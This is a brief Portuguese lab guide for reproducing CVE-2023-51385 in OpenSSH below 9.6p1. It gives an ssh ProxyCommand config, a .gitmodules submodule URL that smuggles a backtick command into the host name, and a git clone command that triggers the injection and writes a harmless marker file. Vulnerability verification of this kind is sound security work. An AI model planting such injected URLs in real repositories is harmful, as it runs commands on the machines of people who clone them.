
Laboratório de reprodução para CVE-2023-51385: injeção de comandos no OpenSSH ProxyCommand através de URLs maliciosas de submódulos git. Guia passo a passo para verificar a vulnerabilidade.
Primeiro, é necessário adicionar o seguinte conteúdo em ~/.ssh/config
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Existe uma injeção de comando na declaração do arquivo .gitmodules
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
Após a configuração, execute o seguinte comando para disparar
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
Se for executado com sucesso, um arquivo cve.txt será gerado no diretório CVE-2023-51385_test

Nota: OpenSSH precisa ser <9.6p1
Detalhes neste blog:
"# cve-2023-51385"